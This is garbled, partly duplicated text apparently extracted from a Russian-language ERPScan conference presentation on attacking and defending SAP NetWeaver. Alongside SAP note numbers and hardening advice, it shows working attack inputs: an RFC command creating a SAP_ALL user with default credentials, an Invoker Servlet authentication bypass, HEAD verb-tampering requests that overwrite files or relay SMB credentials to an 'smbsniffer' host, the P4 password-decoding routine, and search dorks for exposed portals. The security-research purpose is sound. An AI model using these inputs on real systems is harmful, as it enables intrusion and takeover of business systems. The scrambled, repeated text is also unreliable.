ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Доклады о безопасности SAP
bull Всего более 40
erpscancom 3ERPScan mdash invest in security to secure investments
Количество SAP notes за год
bull Всего более 1500 на сентябрь 2011г
erpscancom 4ERPScan mdash invest in security to secure investments
Публичная информация об уязвимостях
bull Всего более 150
erpscancom 5ERPScan mdash invest in security to secure investments
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Количество SAP notes за год
bull Всего более 1500 на сентябрь 2011г
erpscancom 4ERPScan mdash invest in security to secure investments
Публичная информация об уязвимостях
bull Всего более 150
erpscancom 5ERPScan mdash invest in security to secure investments
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
